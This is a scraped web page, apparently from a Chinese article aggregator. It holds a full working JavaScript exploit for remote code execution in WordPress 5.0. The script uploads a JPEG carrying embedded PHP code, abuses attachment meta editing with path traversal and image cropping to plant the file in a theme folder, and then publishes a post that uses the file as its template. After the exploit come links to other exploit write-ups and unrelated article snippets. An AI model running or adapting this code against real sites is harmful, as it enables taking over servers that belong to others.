[EXP]WordPress Core 5.0 - Remote Code Execution
var wpnonce = '';
var ajaxnonce = '';
var wp_attached_file = '';
var imgurl = '';
var postajaxdata = '';
var post_id = 0;
var cmd = '<?php phpinfo();/*';
var cmdlen = cmd.length
var payload = '\xff\xd8\xff\xed\x004Photoshop 3.0\x008BIM\x04\x04'+'\x00'.repeat(5)+'\x17\x1c\x02\x05\x00\x07PAYLOAD\x00\xff\xe0\x00\x10JFIF\x00\x01\x01\x01\x00`\x00`\x00\x00\xff\xdb\x00C\x00\x06\x04\x05\x06\x05\x04\x06\x06\x05\x06\x07\x07\x06\x08\x0a\x10\x0a\x0a\x09\x09\x0a\x14\x0e\x0f\x0c\x10\x17\x14\x18\x18\x17\x14\x16\x16\x1a\x1d%\x1f\x1a\x1b#\x1c\x16\x16 , #&\x27)*)\x19\x1f-0-(0%()(\xff\xc0\x00\x0b\x08\x00\x01\x00\x01\x01\x01\x11\x00\xff\xc4\x00\x14\x00\x01'+'\x00'.repeat(15)+'\x08\xff\xc4\x00\x14\x10\x01'+'\x00'.repeat(16)+'\xff\xda\x00\x08\x01\x01\x00\x00?\x00T\xbf\xff\xd9';
var img = payload.replace('\x07PAYLOAD', String.fromCharCode(cmdlen) + cmd);
var byteArray = Uint8Array.from(img, function(c){return c.codePointAt(0);});
var attachurl = '/wp-admin/media-new.php';
var uploadurl = '/wp-admin/async-upload.php';
var editattachurl = '/wp-admin/post.php?post=PID&action=edit';
var editposturl = '/wp-admin/post.php';
var addposturl = '/wp-admin/post-new.php';
var cropurl = '/wp-admin/admin-ajax.php';
console.log("Get wpnonce token.");
jQuery.get(attachurl, function(data) {
wpnonce = jQuery(data).find('#file-form #_wpnonce').val();
if(wpnonce) {
console.log("Success! wpnonce: " + wpnonce);
var postdata = new FormData();
postdata.append('name', 'ebaldremal.jpg');
postdata.append('post_id', post_id);
postdata.append('_wpnonce', wpnonce);
postdata.append('short', 1);
// file
var phpimage = new File([byteArray], 'ebaldremal.jpg');
postdata.append('async-upload', phpimage);
console.log("Upload image with shell.");
jQuery.ajax({
url: uploadurl,
data: postdata,
cache: false,
contentType: false,
processData: false,
method: 'POST',
success: function(data){
if(jQuery.isNumeric(data)) {
post_id = data;
console.log("Success! Attach ID: " + post_id);
console.log("Get wpnonce for edit post, ajax_nonce for crop and URL for fun.");
jQuery.get(editattachurl.replace('PID', post_id), function(data) {
var btnid = "#imgedit-open-btn-" + post_id;
wpnonce = jQuery(data).find('#post #_wpnonce').val();
ajaxnonce = jQuery(data).find(btnid).attr('onclick').match(/[a-f0-9]{10}/)[0];
imgurl = new URL(jQuery(data).find('#attachment_url').val());
wp_attached_file = imgurl.pathname.match(/uploads\/(.*)/)[1] + "?/any";
console.log("Success! wpnonce: " + wpnonce + ", ajaxnonce: " + ajaxnonce);
if(wpnonce && ajaxnonce) {
console.log("Update _wp_attached_file meta key to: " + wp_attached_file);
postdata = {
'_wpnonce': wpnonce,
'action': 'editpost',
'post_ID': post_id,
'meta_input[_wp_attached_file]': wp_attached_file
}
jQuery.post(editposturl, postdata, function(data){
console.log("Success!");
console.log("Crop image for create help folder.");
postajaxdata = {
'_ajax_nonce': ajaxnonce,
'action': 'crop-image',
'id': post_id,
'cropDetails[width]': 1,
'cropDetails[height]': 1
}
jQuery.post(cropurl, postajaxdata, function(data){
console.log("Success! Help directory created.");
wp_attached_file = imgurl.pathname.match(/uploads\/(.*)/)[1] + "?/../../../../themes/twentynineteen/owned";
console.log("Update _wp_attached_file meta key to: " + wp_attached_file);
postdata = {
'_wpnonce': wpnonce,
'action': 'editpost',
'post_ID': post_id,
'meta_input[_wp_attached_file]': wp_attached_file
}
jQuery.post(editposturl, postdata, function(data){
console.log("Success!");
console.log("Crop image for create evil jpg image inside twentynineteen theme folder.");
jQuery.post(cropurl, postajaxdata, function(data){
console.log("Success!");
console.log("Get wpnonce for create new post.");
jQuery.get(addposturl, function(data){
console.log("Create new post and use evil jpg image as template.");
if(jQuery(data).find('form.metabox-base-form').length) {
wpnonce = jQuery(data).find('form.metabox-base-form #_wpnonce').val();
post_id = jQuery(data).find('form.metabox-base-form #post_ID').val();
} else {
wpnonce = jQuery(data).find('#post #_wpnonce').val();
post_id = jQuery(data).find('#post #post_ID').val();
}
postdata = {
'_wpnonce': wpnonce,
'action': 'editpost',
'post_ID': post_id,
'post_title': 'RCE-HERE',
'visibility': 'public',
'publish': 'Publish',
'meta_input[_wp_page_template]': 'cropped-owned.jpg'
}
jQuery.post(editposturl, postdata, function(data){
console.log("Success! Browse post with id = " + post_id + " to trigger RCE.")
console.log("Trying to open: " + imgurl.origin + "/?p=" + post_id + ")");
window.open(imgurl.origin + "/?p=" + post_id, '_blank');
});
});
});
});
});
});
}
});
}
}
});
}
});
[EXP]WordPress Core 5.0 - Remote Code Execution的更多相关文章
- [EXP]phpBB 3.2.3 - Remote Code Execution
// All greets goes to RIPS Tech // Run this JS on Attachment Settings ACP page var plupload_salt = ' ...
- CVE-2014-6321 && MS14-066 Microsoft Schannel Remote Code Execution Vulnerability Analysis
目录 . 漏洞的起因 . 漏洞原理分析 . 漏洞的影响范围 . 漏洞的利用场景 . 漏洞的POC.测试方法 . 漏洞的修复Patch情况 . 如何避免此类漏洞继续出现 1. 漏洞的起因 这次的CVE和 ...
- [EXP]Apache Superset < 0.23 - Remote Code Execution
# Exploit Title: Apache Superset < 0.23 - Remote Code Execution # Date: 2018-05-17 # Exploit Auth ...
- [EXP]ThinkPHP 5.0.23/5.1.31 - Remote Code Execution
# Exploit Title: ThinkPHP .x < v5.0.23,v5.1.31 Remote Code Execution # Date: -- # Exploit Author: ...
- [EXP]Microsoft Windows MSHTML Engine - "Edit" Remote Code Execution
# Exploit Title: Microsoft Windows (CVE-2019-0541) MSHTML Engine "Edit" Remote Code Execut ...
- MyBB \inc\class_core.php <= 1.8.2 unset_globals() Function Bypass and Remote Code Execution(Reverse Shell Exploit) Vulnerability
catalogue . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 MyBB's unset_globals() function ca ...
- Roundcube 1.2.2 - Remote Code Execution
本文简要记述一下Roundcube 1.2.2远程代码执行漏洞的复现过程. 漏洞利用条件 Roundcube必须配置成使用PHP的mail()函数(如果没有指定SMTP,则是默认开启) PHP的mai ...
- [我的CVE][CVE-2017-15708]Apache Synapse Remote Code Execution Vulnerability
漏洞编号:CNVD-2017-36700 漏洞编号:CVE-2017-15708 漏洞分析:https://www.javasec.cn/index.php/archives/117/ [Apache ...
- Tomcat put上传漏洞_CVE2017-12615( JSP Upload Bypass/Remote Code Execution)
CVE2017-12615漏洞复现( tomcat JSP Upload Bypass /Remote Code Execution) 一.漏洞原理 在windows服务器下,将readonly参数设 ...
随机推荐
- 2018.12.29 codeforces 940E. Cashback(线性dp)
传送门 题意:给出一个nnn个数的序列,要求将序列分成若干段,对于一段长度为kkk的自动删去最小的⌊kc⌋\left \lfloor \frac{k}{c} \right \rfloor⌊ck⌋个数 ...
- vue 开发系列(六) 企业微信整合
概述 手机端程序可以和企业微信进行整合,我们也可以使用企业微信JSSDK功能,实现一些原生的功能. 整合步骤 在整合之前需要阅读 整合步骤. http://work.weixin.qq.com/api ...
- #pragma warning(disable 4786)
#pragma warning(disable 4786) 此warning产生的原因是因为标识符过长,超过了最大限定255个字符类名超过了255个字符,使用时就会报4786的waring. 在使用S ...
- python3.4连接mysql5.7数据库增删改查
#!/usr/bin/env python # -*- coding:utf-8 -*- # __author__ = "blzhu" """ pyt ...
- BZOJ 1059 [ZJOI2007]矩阵游戏 (二分图最大匹配)
1059: [ZJOI2007]矩阵游戏 Time Limit: 10 Sec Memory Limit: 162 MBSubmit: 5281 Solved: 2530[Submit][Stat ...
- 微信小程序之弹框modal
官方文档 <modal hidden="{{hidden}}" title="这里是title" confirm-text="自定义确定按钮&q ...
- IE上如何设置input type=file的光标不闪烁
我们使用文件上传时,时常自定义图标,这时候通常会把input的透明度设置为0,但是在IE上使用时会出现光标闪烁问题 解决办法 css设置font-size为0
- MIT Molecular Biology 笔记3 DNA同源重组
视频 https://www.bilibili.com/video/av7973580?from=search&seid=16993146754254492690 教材 Molecular ...
- memcache和redis本质区别在哪里?
转自:http://www.dewen.org/q/971/memcache%E5%92%8Credis%E6%9C%AC%E8%B4%A8%E5%8C%BA%E5%88%AB%E5%9C%A8%E5 ...
- 04:第一个OC类
1.类与对象的关系 面向对象的核心就是对象,那怎么创建对象? OC中创建对象比较复杂, 首先要理解一个概念叫做类. 现实生活中是根据一份描述,一份模板创建对象,编程语言也一样,也必须先有一份描述,在这 ...